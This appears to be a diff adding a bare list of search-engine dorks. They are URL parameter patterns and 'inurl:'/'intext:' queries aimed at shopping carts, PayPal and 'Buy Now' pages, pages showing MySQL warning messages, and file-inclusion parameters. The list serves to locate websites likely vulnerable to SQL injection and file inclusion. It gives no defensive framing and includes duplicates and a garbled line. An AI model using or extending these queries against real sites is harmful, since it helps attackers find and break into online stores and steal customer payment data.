+detailed_product.asp?id=
+detailed_product.asp?id=
+company.asp?ID=
+newsletter/newsletter.php?id=
+details.php?id=
+details.php?id=
+boat_plans.asp?id=
+prod_show.asp?prodid=
+prod_show.asp?id=
+fonts/details.php?id=
+articles.php?id=
+tourdetail.php?id=
+program/details.php?ID=
+abouttheregions_province.php?id=
+abouttheregions_village.php?id=
+Search_Data_Sheet.asp?ID=
+indepth/details.php?id=
+page.php?id=
+article.php?id=
+booking/bandinfo.php?id=
+store/store_detail.php?id=
+articles/index.php?id=
+event.php?id=
+cat.asp?id=
+store/news_story.php?id=
+ddoecom/index.php?id=
+product.asp?id=
+shop/shop.php?id=
+ArtistDetail.php?id=
+invent/details.php?id=
+page.php?id=
+eventtype.php?id=
+c_page.php?id=
+cms/story.php?id=
+downloads.asp?software=
+737en.php?id=
+events/event.php?id=
+auction_details.php?auction_id=
+store-detail.php?ID=
+details.php?id=
+index.php?id=
+article.php?id=
+news_detail.asp?id=
+projects/pview.php?id=
+report-detail.asp?id=
+article/index.php?id=
+store.php?id=
+artists/story/index.php?id=
+franchise2.php?id=
+article.php?id=
+rentals.php?id=
+worthies/details.php?id=
+artists/index.php?id=
+mylink.php?id=
+resource.php?id=
+category_id.php?id=
+products.asp?ID=
+detail.php?id=
+lakeinfo.php?id=
+business/details.php?id=
+news/details.php?id=
+list.php?id=
+en/visit.php?id=
+product_details.asp?id=
+store.php?id=
+viewprofile.php?id=
+lowell/restaurants.php?id=
+en/details.php?id=
+en/details.php?id=
+rca/store/item.php?item=
+Steamboat_Springs_Vacation_Rental.php?ID=
+where/details.php?id=
+htmlpage.php?id=
+details.php?id=
+details.php?id=
+melbourne.php?id=
+melbourne_details.php?id=
+products.php?ID=
+Stacks/storyprof.php?ID=
+artists.php?id=
+board/showthread.php?t=
+workshopview.php?id=
+workshopview.php?id=
+artists/details.php?id=
+displayArticle.php?id=
+event.php?id=
+services_details_description.php?id=
+product.asp?id=
+WhitsundaySailing.php?id=
+nl/default.asp?id=
+directory/listing_coupons.php?id=
+exhibitions/details.php?id=
+details.php?id=
+page.php?id=
+cheats/details.php?ID=
+media_display.php?id=
+********.php?id=
+articles.php?id=
+index.php?id=
+video.php?id=
+news-details.php?id=
+details.php?id=
+press2.php?ID=
+products/treedirectory.asp?id=
+events/details.php?id=
+calendar/event.php?id=
+page.php?id=
+ficha.php?id=
+links/browse.php?id=
+wwdsemea/default.asp?ID=
+forum/showthread.php?t=
+media.php?id=
+review.php?id=
+store/item.php?id=
+
+asp
+ßæÏ:
+
+about.asp?cartID=
+accinfo.asp?cartId=
+acclogin.asp?cartID=
+add.asp?bookid=
+add_cart.asp?num=
+addcart.asp?
+addItem.asp
+add-to-cart.asp?ID=
+addToCart.asp?idProduct=
+addtomylist.asp?ProdId=
+adminEditProductFields.asp?intProdID=
+advSearch_h.asp?idCategory=
+affiliate.asp?ID=
+affiliate-agreement.cfm?storeid=
+affiliates.asp?id=
+ancillary.asp?ID=
+archive.asp?id=
+article.asp?id=
+aspx?PageID
+basket.asp?id=
+Book.asp?bookID=
+book_list.asp?bookid=
+book_view.asp?bookid=
+BookDetails.asp?ID=
+browse.asp?catid=
+browse_item_details.asp
+Browse_Item_Details.asp?Store_Id=
+buy.asp?
+buy.asp?bookid=
+bycategory.asp?id=
+cardinfo.asp?card=
+cart.asp?action=
+cart.asp?cart_id=
+cart.asp?id=
+cart_additem.asp?id=
+cart_validate.asp?id=
+cartadd.asp?id=
+cat.asp?iCat=
+catalog.asp
+catalog.asp?CatalogID=
+catalog_item.asp?ID=
+catalog_main.asp?catid=
+category.asp
+category.asp?catid=
+category_list.asp?id=
+categorydisplay.asp?catid=
+checkout.asp?cartid=
+checkout.asp?UserID=
+checkout_confirmed.asp?order_id=
+checkout1.asp?cartid=
+comersus_listCategoriesAndProducts.asp?idCategory=
+comersus_optEmailToFriendForm.asp?idProduct=
+comersus_optReviewReadExec.asp?idProduct=
+comersus_viewItem.asp?idProduct=
+comments_form.asp?ID=
+contact.asp?cartId=
+content.asp?id=
+customerService.asp?****ID1=
+default.asp?catID=
+description.asp?bookid=
+details.asp?BookID=
+details.asp?Press_Release_ID=
+details.asp?Product_ID=
+details.asp?Service_ID=
+display_item.asp?id=
+displayproducts.asp
+downloadTrial.asp?intProdID=
+emailproduct.asp?itemid=
+emailToFriend.asp?idProduct=
+events.asp?ID=
+faq.asp?cartID=
+faq_list.asp?id=
+faqs.asp?id=
+feedback.asp?title=
+freedownload.asp?bookid=
+fullDisplay.asp?item=
+getbook.asp?bookid=
+GetItems.asp?itemid=
+giftDetail.asp?id=
+help.asp?CartId=
+home.asp?id=
+index.asp?cart=
+index.asp?cartID=
+index.asp?ID=
+info.asp?ID=
+item.asp?eid=
+item.asp?item_id=
+item.asp?itemid=
+item.asp?model=
+item.asp?prodtype=
+item.asp?shopcd=
+item_details.asp?catid=
+item_list.asp?maingroup
+item_show.asp?code_no=
+itemDesc.asp?CartId=
+itemdetail.asp?item=
+itemdetails.asp?catalogid=
+learnmore.asp?cartID=
+links.asp?catid=
+list.asp?bookid=
+List.asp?CatID=
+
+listcategoriesandproducts.asp?idCategory=
+modline.asp?id=
+myaccount.asp?catid=
+news.asp?id=
+order.asp?BookID=
+order.asp?id=
+order.asp?item_ID=
+OrderForm.asp?Cart=
+page.asp?PartID=
+payment.asp?CartID=
+pdetail.asp?item_id=
+powersearch.asp?CartId=
+price.asp
+privacy.asp?cartID=
+prodbycat.asp?intCatalogID=
+prodetails.asp?prodid=
+prodlist.asp?catid=
+product.asp?bookID=
+product.asp?intProdID=
+product_info.asp?item_id=
+productDetails.asp?idProduct=
+productDisplay.asp
+productinfo.asp?item=
+productlist.asp?ViewType=Category&CategoryID=
+productpage.asp
+products.asp?ID=
+products.asp?keyword=
+products_category.asp?CategoryID=
+products_detail.asp?CategoryID=
+productsByCategory.asp?intCatalogID=
+prodView.asp?idProduct=
+promo.asp?id=
+promotion.asp?catid=
+pview.asp?Item=
+resellers.asp?idCategory=
+results.asp?cat=
+savecart.asp?CartId=
+search.asp?CartID=
+searchcat.asp?search_id=
+Select_Item.asp?id=
+Services.asp?ID=
+shippinginfo.asp?CartId=
+shop.asp?a=
+shop.asp?action=
+shop.asp?bookid=
+shop.asp?cartID=
+shop_details.asp?prodid=
+shopaddtocart.asp
+shopaddtocart.asp?catalogid=
+shopbasket.asp?bookid=
+shopbycategory.asp?catid=
+shopcart.asp?title=
+shopcreatorder.asp
+shopcurrency.asp?cid=
+shopdc.asp?bookid=
+shopdisplaycategories.asp
+shopdisplayproduct.asp?catalogid=
+shopdisplayproducts.asp
+shopexd.asp
+shopexd.asp?catalogid=
+shopping_basket.asp?cartID=
+shopprojectlogin.asp
+shopquery.asp?catalogid=
+shopremoveitem.asp?cartid=
+shopreviewadd.asp?id=
+shopreviewlist.asp?id=
+ShopSearch.asp?CategoryID=
+shoptellafriend.asp?id=
+shopthanks.asp
+shopwelcome.asp?title=
+show_item.asp?id=
+show_item_details.asp?item_id=
+showbook.asp?bookid=
+showStore.asp?catID=
+shprodde.asp?SKU=
+specials.asp?id=
+store.asp?id=
+store_bycat.asp?id=
+store_listing.asp?id=
+Store_ViewProducts.asp?Cat=
+store-details.asp?id=
+storefront.asp?id=
+storefronts.asp?title=
+storeitem.asp?item=
+StoreRedirect.asp?ID=
+subcategories.asp?id=
+tek9.asp?
+template.asp?Action=Item&pid=
+topic.asp?ID=
+tuangou.asp?bookid=
+type.asp?iType=
+updatebasket.asp?bookid=
+updates.asp?ID=
+view.asp?cid=
+view_cart.asp?title=
+view_detail.asp?ID=
+viewcart.asp?CartId=
+viewCart.asp?userID=
+viewCat_h.asp?idCategory=
+viewevent.asp?EventID=
+viewitem.asp?recor=
+viewPrd.asp?idcategory=
+ViewProduct.asp?misc=
+voteList.asp?item_ID=
+whatsnew.asp?idCategory=
+WsAncillary.asp?ID=
+WsPages.asp?ID=noticiasDetalle.asp?xid=
+sitio/item.asp?idcd=
+index.asp?site=
+de/content.asp?page_id=
+gallerysort.asp?iid=
+products.asp?type=
+event.asp?id=
+showfeature.asp?id=
+home.asp?ID=
+tas/event.asp?id=
+profile.asp?id=
+details.asp?id=
+past-event.asp?id=
+index.asp?action=
+site/products.asp?prodid=
+page.asp?pId=
+resources/vulnerabilities_list.asp?id=
+site.asp?id=
+products/index.asp?rangeid=
+global_projects.asp?cid=
+publications/view.asp?id=
+display_page.asp?id=
+pages.asp?ID=
+lmsrecords_cd.asp?cdid=
+product.asp?prd=
+cat/?catid=
+products/product-list.asp?id=
+debate-detail.asp?id=
+cbmer/congres/page.asp?LAN=
+content.asp?id=
+news.asp?ID=
+photogallery.asp?id=
+index.asp?id=
+product/product.asp?product_no=
+nyheder.htm?show=
+book.asp?ID=
+print.asp?id=
+detail.asp?id=
+book.asp?id=
+content.asp?PID=
+more_detail.asp?id=
+content.asp?id=
+view_items.asp?id=
+view_author.asp?id=
+main.asp?id=
+english/fonction/print.asp?id=
+magazines/adult_magazine_single_page.asp?magid=
+product_details.asp?prodid=
+magazines/adult_magazine_full_year.asp?magid=
+products/card.asp?prodID=
+catalog/product.asp?cat_id=
+e_board/modifyform.html?code=
+community/calendar-event-fr.asp?id=
+products.asp?p=
+news.asp?id=
+view/7/9628/1.html?reply=
+product_details.asp?prodid=
+catalog/product.asp?pid=
+rating.asp?id=
+?page=
+catalog/main.asp?cat_id=
+index.asp?page=
+detail.asp?prodid=
+products/product.asp?pid=
+news.asp?id=
+book_detail.asp?BookID=
+catalog/main.asp?cat_id=
+catalog/main.asp?cat_id=
+default.asp?cPath=
+catalog/main.asp?cat_id=
+catalog/main.asp?cat_id=
+category.asp?catid=
+categories.asp?cat=
+categories.asp?cat=
+detail.asp?prodID=
+detail.asp?id=
+category.asp?id=
+hm/inside.asp?id=
+index.asp?area_id=
+gallery.asp?id=
+products.asp?cat=
+products.asp?cat=
+media/pr.asp?id=
+books/book.asp?proj_nr=
+products/card.asp?prodID=
+general.asp?id=
+news.asp?t=
+usb/devices/showdev.asp?id=
+content/detail.asp?id=
+templet.asp?acticle_id=
+news/news/title_show.asp?id=
+product.asp?id=
+index.asp?url=
+cryolab/content.asp?cid=
+ls.asp?id=
+s.asp?w=
+abroad/page.asp?cid=
+bayer/dtnews.asp?id=
+news/temp.asp?id=
+index.asp?url=
+book/bookcover.asp?bookid=
+index.asp/en/component/pvm/?view=
+product/list.asp?pid=
+cats.asp?cat=
+software_categories.asp?cat_id=
+print.asp?sid=
+docDetail.aspx?chnum=
+index.asp?section=
+index.asp?page=
+index.asp?page=
+en/publications.asp?id=
+events/detail.asp?ID=
+forum/profile.asp?id=
+media/pr.asp?id=
+content.asp?ID=
+cloudbank/detail.asp?ID=
+pages.asp?id=
+news.asp?id=
+beitrag_D.asp?id=
+content/index.asp?id=
+index.asp?i=
+?action=
+index.asp?page=
+beitrag_F.asp?id=
+index.asp?pageid=
+page.asp?modul=
+detail.asp?id=
+index.asp?w=
+index.asp?modus=
+news.asp?id=
+news.asp?id=
+aktuelles/meldungen-detail.asp?id=
+item.asp?id=
+obio/detail.asp?id=
+page/de/produkte/produkte.asp?prodID=
+packages_display.asp?ref=
+shop/index.asp?cPath=
+modules.asp?bookid=
+product-range.asp?rangeID=
+en/news/fullnews.asp?newsid=
+deal_coupon.asp?cat_id=
+show.asp?id=
+blog/index.asp?idBlog=
+redaktion/whiteteeth/detail.asp?nr=
+HistoryStore/pages/item.asp?itemID=
+aktuelles/veranstaltungen/detail.asp?id=
+tecdaten/showdetail.asp?prodid=
+?id=
+rating/stat.asp?id=
+content.asp?id=
+viewapp.asp?id=
+item.asp?id=
+news/newsitem.asp?newsID=
+FernandFaerie/index.asp?c=
+show.asp?id=
+?cat=
+categories.asp?cat=
+category.asp?c=
+
+product_info.asp?id=
+prod.asp?cat=
+store/product.asp?productid=
+browsepr.asp?pr=
+product-list.asp?cid=
+products.asp?cat_id=
+product.asp?ItemID=
+category.asp?c=
+main.asp?id=
+article.asp?id=
+showproduct.asp?productId=
+view_item.asp?item=
+skunkworks/content.asp?id=
+index.asp?id=
+item_show.asp?id=
+publications.asp?Id=
+index.asp?t=
+view_items.asp?id=
+portafolio/portafolio.asp?id=
+YZboard/view.asp?id=
+index_en.asp?ref=
+index_en.asp?ref=
+category.asp?id_category=
+main.asp?id=
+main.asp?id=
+calendar/event.asp?id=
+default.asp?cPath=
+pages/print.asp?id=
+index.asp?pg_t=
+_news/news.asp?id=
+forum/showProfile.asp?id=
+fr/commande-liste-categorie.asp?panier=
+downloads/shambler.asp?id=
+sinformer/n/imprimer.asp?id=
+More_Details.asp?id=
+directory/contenu.asp?id_cat=
+properties.asp?id_cat=
+forum/showProfile.asp?id=
+downloads/category.asp?c=
+index.asp?cat=
+product_info.asp?products_id=
+product_info.asp?products_id=
+product-list.asp?category_id=
+detail.asp?siteid=
+projects/event.asp?id=
+view_items.asp?id=
+more_details.asp?id=
+melbourne_details.asp?id=
+more_details.asp?id=
+detail.asp?id=
+more_details.asp?id=
+home.asp?cat=
+idlechat/message.asp?id=
+detail.asp?id=
+print.asp?sid=
+more_details.asp?id=
+default.asp?cPath=
+events/event.asp?id=
+brand.asp?id=
+toynbeestudios/content.asp?id=
+show-book.asp?id=
+more_details.asp?id=
+store/default.asp?cPath=
+property.asp?id=
+product_details.asp?id=
+more_details.asp?id=
+view-event.asp?id=
+content.asp?id=
+book.asp?id=
+page/venue.asp?id=
+print.asp?sid=
+colourpointeducational/more_details.asp?id=
+print.asp?sid=
+browse/book.asp?journalID=
+section.asp?section=
+bookDetails.asp?id=
+profiles/profile.asp?profileid=
+event.asp?id=
+gallery.asp?id=
+category.asp?CID=
+corporate/newsreleases_more.asp?id=
+print.asp?id=
+view_items.asp?id=
+more_details.asp?id=
+county-facts/diary/vcsgen.asp?id=
+idlechat/message.asp?id=
+podcast/item.asp?pid=
+products.asp?act=
+details.asp?prodId=
+socsci/events/full_details.asp?id=
+ourblog.asp?categoryid=
+mall/more.asp?ProdID=
+archive/get.asp?message_id=
+review/review_form.asp?item_id=
+english/publicproducts.asp?groupid=
+news_and_notices.asp?news_id=
+rounds-detail.asp?id=
+gig.asp?id=
+board/view.asp?no=
+index.asp?modus=
+news_item.asp?id=
+rss.asp?cat=
+products/product.asp?id=
+details.asp?ProdID=
+els_/product/product.asp?id=
+store/description.asp?iddesc=
+socsci/news_items/full_story.asp?id=
+modules/forum/index.asp?topic_id=
+feature.asp?id=
+products/Blitzball.htm?id=
+profile_print.asp?id=
+questions.asp?questionid=
+html/scoutnew.asp?prodid=
+main/index.asp?action=
+********.asp?cid=
+********.asp?cid=
+news.asp?type=
+index.asp?page=
+viewthread.asp?tid=
+summary.asp?PID=
+news/latest_news.asp?cat_id=
+index.asp?cPath=
+category.asp?CID=
+index.asp?pid=
+more_details.asp?id=
+specials.asp?osCsid=
+search/display.asp?BookID=
+articles.asp?id=
+print.asp?sid=
+page.asp?id=
+more_details.asp?id=
+newsite/pdf_show.asp?id=
+shop/category.asp?cat_id=
+shopcafe-shop-product.asp?bookId=
+shop/books_detail.asp?bookID=
+index.asp?cPath=
+more_details.asp?id=
+news.asp?id=
+more_details.asp?id=
+shop/books_detail.asp?bookID=
+more_details.asp?id=
+blog.asp?blog=
+index.asp?pid=
+prodotti.asp?id_cat=
+category.asp?CID=
+more_details.asp?id=
+poem_list.asp?bookID=
+more_details.asp?id=
+content.asp?categoryId=
+authorDetails.asp?bookID=
+press_release.asp?id=
+item_list.asp?cat_id=
+colourpointeducational/more_details.asp?id=
+index.asp?pid=
+download.asp?id=
+shop/category.asp?cat_id=
+i-know/content.asp?page=
+store/index.asp?cat_id=
+yacht_search/yacht_view.asp?pid=
+pharmaxim/category.asp?cid=
+print.asp?sid=
+specials.asp?osCsid=
+store.asp?cat_id=
+category.asp?cid=
+displayrange.asp?rangeid=
+product.asp?id=
+csc/news-details.asp?cat=
+products-display-details.asp?prodid=
+stockists_list.asp?area_id=
+news/newsitem.asp?newsID=
+index.asp?pid=
+newsitem.asp?newsid=
+category.asp?id=
+news/newsitem.asp?newsID=
+details.asp?prodId=
+publications/publication.asp?id=
+purelydiamond/products/category.asp?cat=
+category.asp?cid=
+product/detail.asp?id=
+news/newsitem.asp?newsID=
+details.asp?prodID=
+item.asp?item_id=
+edition.asp?area_id=
+page.asp?area_id=
+view_newsletter.asp?id=
+library.asp?cat=
+categories.asp?cat=
+page.asp?area_id=
+categories.asp?cat=
+publications.asp?id=
+item.asp?sub_id=
+page.asp?area_id=
+page.asp?area_id=
+category.asp?catid=
+content.asp?cID=
+newsitem.asp?newsid=
+frontend/category.asp?id_category=
+news/newsitem.asp?newsID=
+things-to-do/detail.asp?id=
+page.asp?area_id=
+page.asp?area_id=
+listing.asp?cat=
+item.asp?iid=
+customer/home.asp?cat=
+staff/publications.asp?sn=
+news/newsitem.asp?newsID=
+library.asp?cat=
+main/index.asp?uid=
+library.asp?cat=
+shop/eventshop/product_detail.asp?itemid=
+news/newsitem.asp?newsID=
+news/newsitem.asp?newsID=
+library.asp?cat=
+FullStory.asp?Id=
+publications.asp?ID=
+publications/book_reviews/full_review.asp?id=
+newsitem.asp?newsID=
+newsItem.asp?newsId=
+site/en/list_service.asp?cat=
+page.asp?area_id=
+product.asp?ProductID=
+releases_headlines_details.asp?id=
+product.asp?shopprodid=
+product.asp?productid=
+product.asp?product=
+product.asp?product_id=
+productlist.asp?id=
+product.asp?shopprodid=
+garden_equipment/pest-weed-control/product.asp?pr=
+product.asp?shopprodid=
+browsepr.asp?pr=
+productlist.asp?id=
+kshop/product.asp?productid=
+product.asp?pid=
+showproduct.asp?prodid=
+product.asp?productid=
+productlist.asp?id=
+index.asp?pageId=
+productlist.asp?tid=
+product-list.asp?id=
+onlinesales/product.asp?product_id=
+garden_equipment/Fruit-Cage/product.asp?pr=
+product.asp?shopprodid=
+product_info.asp?products_id=
+productlist.asp?tid=
+showsub.asp?id=
+productlist.asp?fid=
+products.asp?cat=
+products.asp?cat=
+product-list.asp?id=
+product.asp?sku=
+store/product.asp?productid=
+products.asp?cat=
+productList.asp?cat=
+product_detail.asp?product_id=
+product.asp?pid=
+wiki/pmwiki.asp?page****=
+summary.asp?PID=
+productlist.asp?grpid=
+cart/product.asp?productid=
+db/CART/product_details.asp?product_id=
+ProductList.asp?id=
+products/product.asp?id=
+product.asp?shopprodid=
+product_info.asp?products_id=
+product_ranges_view.asp?ID=
+cei/cedb/projdetail.asp?projID=
+products.asp?DepartmentID=
+product.asp?shopprodid=
+product.asp?shopprodid=
+product_info.asp?products_id=
+index.asp?news=
+education/content.asp?page=
+Interior/productlist.asp?id=
+products.asp?categoryID=
+modules.asp?****=
+message/comment_threads.asp?postID=
+artist_art.asp?id=
+products.asp?cat=
+index.asp?option=
+ov_tv.asp?item=
+index.asp?lang=
+showproduct.asp?cat=
+index.asp?lang=
+product.asp?bid=
+product.asp?bid=
+cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
+item_show.asp?lid=
+?pagerequested=
+downloads.asp?id=
+print.asp?sid=
+print.asp?sid=
+product.asp?intProductID=
+productList.asp?id=
+product.asp?intProductID=
+more_details.asp?id=
+more_details.asp?id=
+books.asp?id=
+index.asp?offs=
+mboard/replies.asp?parent_id=
+Computer Science.asp?id=
+news.asp?id=
+pdf_post.asp?ID=
+reviews.asp?id=
+art.asp?id=
+prod.asp?cat=
+event_info.asp?p=
+view_items.asp?id=
+home.asp?cat=
+item_book.asp?CAT=
+www/index.asp?page=
+schule/termine.asp?view=
+goods_detail.asp?data=
+storemanager/contents/item.asp?page_code=
+view_items.asp?id=
+customer/board.htm?mode=
+help/com_view.html?code=
+n_replyboard.asp?typeboard=
+eng_board/view.asp?T****=
+prev_results.asp?prodID=
+bbs/view.asp?no=
+gnu/?doc=
+zb/view.asp?uid=
+global/product/product.asp?gubun=
+inurl:.php?cat=+intext:Paypal+site:UK
+
+inurl:.php?cat=+intext:/Buy Now/+site:.net
+
+inurl:.php?cid=+intext:online+betting
+
+inurl:.php?id= intext:View cart
+
+inurl:.php?id= intext:Buy Now
+
+inurl:.php?id= intext:add to cart
+
+inurl:.php?id= intext:shopping
+
+inurl:.php?id= intext:boutique
+
+inurl:.php?id= intext:/store/
+
+inurl:.php?id= intext:/shop/
+
+inurl:.php?id= intext:toys
+
+inurl:.php?cid=
+
+inurl:.php?cid= intext:shopping
+
+inurl:.php?cid= intext:add to cart
+
+inurl:.php?cid= intext:Buy Now
+
+inurl:.php?cid= intext:View cart
+
+inurl:.php?cid= intext:boutique
+
+inurl:.php?cid= intext:/store/
+
+inurl:.php?cid= intext:/shop/
+
+inurl:.php?cid= intext:Toys
+
+inurl:.php?cat=
+
+inurl:.php?cat= intext:shopping
+
+inurl:.php?cat= intext:add to cart
+
+inurl:.php?cat= intext:Buy Now
+
+inurl:.php?cat= intext:View cart
+
+inurl:.php?cat= intext:boutique
+
+ inurl:.php?cat= intext:/store/
+
+inurl:.php?cat= intext:/shop/
+
+inurl:.php?cat= intext:Toys
+
+inurl:.php?catid=
+
+inurl:.php?catid= intext:View cart
+
+inurl:.php?catid= intext:Buy Now
+
+inurl:.php?catid= intext:add to cart
+
+inurl:.php?catid= intext:shopping
+
+inurl:.php?catid= intext:boutique
+
+inurl:.php?catid= intext:/store/
+
+inurl:.php?catid= intext:/shop/
+
+inurl:.php?catid= intext:Toys
+
+inurl:.php?categoryid=
+
+inurl:.php?categoryid= intext:View cart
+
+inurl:.php?categoryid= intext:Buy Now
+
+inurl:.php?categoryid= intext:add to cart
+
+inurl:.php?categoryid= intext:shopping
+
+inurl:.php?categoryid= intext:boutique
+
+inurl:.php?categoryid= intext:/store/
+
+inurl:.php?categoryid= intext:/shop/
+
+inurl:.php?categoryid= intext:Toys
+
+inurl:.php?pid=
+
+inurl:.php?pid= intext:shopping
+
+inurl:.php?pid= intext:add to cart
+
+inurl:.php?pid= intext:Buy Now
+
+inurl:.php?pid= intext:View cart
+
+inurl:.php?pid= intext:boutique
+
+cat.asp?cat=
+productlist.asp?catalogid=
+
+Category.asp?category_id=
+
+Category.cfm?category_id=
+
+category.asp?cid=
+
+category.cfm?cid=
+
+category.asp?cat=
+
+category.cfm?cat=
+
+category.asp?id=
+
+index.cfm?pageid=
+
+category.asp?catid=
+
+Category.asp?c=
+
+Category.cfm?c=
+
+productlist.cfm?catalogid=
+
+productlist.asp?catalogid=
+
+viewitem.asp?catalogid=
+
+viewitem.cfm?catalogid=
+
+catalog.cfm?catalogId=
+
+catalog.asp?catalogId=
+
+department.cfm?dept=
+
+department.asp?dept=
+
+itemdetails.cfm?catalogId=
+
+itemdetails.asp?catalogId=
+
+product_detail.asp?catalogid=
+
+product_detail.cfm?catalogid=
+
+product_list.asp?catalogid=
+
+product_list.cfm?catalogid=
+
+ShowProduct.cfm?CatID=
+
+ShowProduct.asp?CatID=
+
+search_results.cfm?txtsearchParamCat=
+
+search_results.asp?txtsearchParamCat=
+
+itemdetails.cfm?catalogId=
+
+itemdetails.asp?catalogId=
+
+store-page.cfm?go=
+
+store-page.asp?go=
+
+Detail.cfm?CatalogID=
+
+Detail.asp?CatalogID=
+
+browse.cfm?category_id=
+
+view.cfm?category_id=
+
+products.cfm?category_id=
+
+index.cfm?Category_ID=
+
+detail.cfm?id=
+
+category.cfm?id=
+
+showitems.cfm?category_id=
+
+ViewProduct.asp?PID=
+
+ViewProduct.cfm?PID=
+
+shopdisplayproducts.asp?catalogid=
+
+shopdisplayproducts.cfn?catalogid=
+
+displayproducts.cfm?category_id=
+
+displayproducts.asp?category_id=
+
+DisplayProducts.asp?prodcat=
+
+DisplayProducts.cfm?prodcat=x
+
+productDetail.cfm?ProductID=
+
+products.php?subcat_id=
+
+showitem.cfm?id=21
+
+productdetail.cfm?pid=
+
+default.cfm?action=46
+
+products_accessories.asp?CatId=
+
+Store_ViewProducts.asp?Cat=
+
+category.cfm?categoryID=
+
+category.asp?category=
+
+tepeecart.cfm?shopid=
+
+view_product.asp?productID=
+
+ProductDetails.asp?prdId=12
+
+products.cfm?ID=
+
+detail.asp?product_id=
+
+product_detail.asp?product_id=
+
+products.php?subcat_id=
+
+product.php?product_id=
+
+view_product.cfm?productID=
+
+product_details.asp?prodid=
+
+shopdisplayproducts.cfm?id=
+
+displayproducts.cfm?id=
+trainers.php?id=
+play_old.php?id=
+declaration_more.php?decl_id=
+Pageid=
+games.php?id=
+newsDetail.php?id=
+staff_id=
+historialeer.php?num=
+product-item.php?id=
+news_view.php?id=
+humor.php?id=
+communique_detail.php?id=
+sem.php3?id=
+opinions.php?id=
+spr.php?id=
+pages.php?id=
+chappies.php?id=
+prod_detail.php?id=
+viewphoto.php?id=
+view.php?id=
+website.php?id=
+hosting_info.php?id=
+gery.php?id=
+detail.php?ID=
+publications.php?id=
+Productinfo.php?id=
+releases.php?id=
+ray.php?id=
+produit.php?id=
+pop.php?id=
+shopping.php?id=
+productdetail.php?id=
+post.php?id=
+section.php?id=
+theme.php?id=
+page.php?id=
+shredder-categories.php?id=
+product_ranges_view.php?ID=
+shop_category.php?id=
+channel_id=
+newsid=
+news_display.php?getid=
+ages.php?id=
+clanek.php4?id=
+review.php?id=
+iniziativa.php?in=
+curriculum.php?id=
+labels.php?id=
+look.php?ID=
+galeri_info.php?l=
+tekst.php?idt=
+newscat.php?id=
+newsticker_info.php?idn=
+rubrika.php?idr=
+offer.php?idf=
+id= & intext:Warning: mysql_fetch_array()
+id= & intext:Warning: getimagesize()
+id= & intext:Warning: session_start()
+id= & intext:Warning: mysql_num_rows()
+id= & intext:Warning: mysql_query()
+id= & intext:Warning: array_merge()
+id= & intext:Warning: preg_match()
+id= & intext:Warning: ilesize()
+id= & intext:Warning: filesize()
+index.php?id=
+buy.php?category=
+article.php?ID=
+play_old.php?id=
+newsitem.php?num=
+top10.php?cat=
+historialeer.php?num=
+reagir.php?num=
+Stray-Questions-View.php?num=
+forum_bds.php?num=
+game.php?id=
+view_product.php?id=
+sw_comment.php?id=
+news.php?id=
+avd_start.php?avd=
+event.php?id=
+sql.php?id=
+news_view.php?id=
+select_biblio.php?id=
+humor.php?id=
+ogl_inet.php?ogl_id=
+fiche_spectacle.php?id=
+communique_detail.php?id=
+sem.php3?id=
+kategorie.php4?id=
+faq2.php?id=
+show_an.php?id=
+preview.php?id=
+loadpsb.php?id=
+opinions.php?id=
+spr.php?id=
+announce.php?id=
+participant.php?id=
+download.php?id=
+main.php?id=
+review.php?id=
+chappies.php?id=
+read.php?id=
+prod_detail.php?id=
+article.php?id=
+person.php?id=
+productinfo.php?id=
+showimg.php?id=
+view.php?id=
+website.php?id=
+hosting_info.php?id=
+gery.php?id=
+rub.php?idr=
+view_faq.php?id=
+artikelinfo.php?id=
+detail.php?ID=
+index.php?=
+profile_view.php?id=
+category.php?id=
+publications.php?id=
+fellows.php?id=
+downloads_info.php?id=
+prod_info.php?id=
+shop.php?do=part&id=
+collectionitem.php?id=
+band_info.php?id=
+product.php?id=
+releases.php?id=
+ray.php?id=
+produit.php?id=
+pop.php?id=
+shopping.php?id=
+productdetail.php?id=
+post.php?id=
+viewshowdetail.php?id=
+clubpage.php?id=
+memberInfo.php?id=
+section.php?id=
+theme.php?id=
+page.php?id=
+shredder-categories.php?id=
+tradeCategory.php?id=
+product_ranges_view.php?ID=
+shop_category.php?id=
+transcript.php?id=
+channel_id=
+item_id=
+newsid=
+trainers.php?id=
+news-full.php?id=
+news_display.php?getid=
+index2.php?option=
+readnews.php?id=
+newsone.php?id=
+product-item.php?id=
+pages.php?id=
+clanek.php4?id=
+viewapp.php?id=
+
+viewphoto.php?id=
+galeri_info.php?l=
+iniziativa.php?in=
+curriculum.php?id=
+labels.php?id=
+story.php?id=
+look.php?ID=
+aboutbook.php?id=
+id= & intext:Warning: mysql_fetch_assoc()
+id= & intext:Warning: is_writable()
+id= & intext:Warning: Unknown()
+id= & intext:Warning: mysql_result()
+id= & intext:Warning: pg_exec()
+id= & intext:Warning: require()
+buy.php?category=
+pageid=
+page.php?file=
+show.php?id=
+newsitem.php?num=
+readnews.php?id=
+top10.php?cat=
+reagir.php?num=
+Stray-Questions-View.php?num=
+forum_bds.php?num=
+game.php?id=
+view_product.php?id=
+sw_comment.php?id=
+news.php?id=
+avd_start.php?avd=
+event.php?id=
+sql.php?id=
+select_biblio.php?id=
+ogl_inet.php?ogl_id=
+fiche_spectacle.php?id=
+kategorie.php4?id=
+faq2.php?id=
+show_an.php?id=
+loadpsb.php?id=
+announce.php?id=
+participant.php?id=
+download.php?id=
+article.php?id=
+person.php?id=
+productinfo.php?id=
+showimg.php?id=
+rub.php?idr=
+view_faq.php?id=
+artikelinfo.php?id=
+index.php?=
+profile_view.php?id=
+category.php?id=
+fellows.php?id=
+downloads_info.php?id=
+prod_info.php?id=
+shop.php?do=part&id=
+collectionitem.php?id=
+band_info.php?id=
+product.php?id=
+viewshowdetail.php?id=
+clubpage.php?id=
+memberInfo.php?id=
+tradeCategory.php?id=
+transcript.php?id=
+item_id=
+news-full.php?id=
+aboutbook.php?id=
+preview.php?id=
+material.php?id=
+read.php?id=
+viewapp.php?id=
+story.php?id=
+newsone.php?id=
+rubp.php?idr=
+art.php?idm=
+title.php?id=
+index1.php?modo=
+include.php?*[*]*=
+nota.php?pollname=
+index3.php?p=
+padrao.php?pre=
+home.php?pa=
+main.php?type=
+sitio.php?start=
+*.php?include=
+general.php?xlink=
+show.php?go=
+nota.php?ki=
+down*.php?oldal=
+layout.php?disp=
+enter.php?chapter=
+base.php?incl=
+enter.php?mod=
+show.php?corpo=
+head.php?*[*]*=
+info.php?strona=
+template.php?str=
+main.php?doshow=
+view.php?*[*]*=
+index.php?to=
+page.php?cmd=
+view.php?b=
+info.php?option=
+show.php?x=
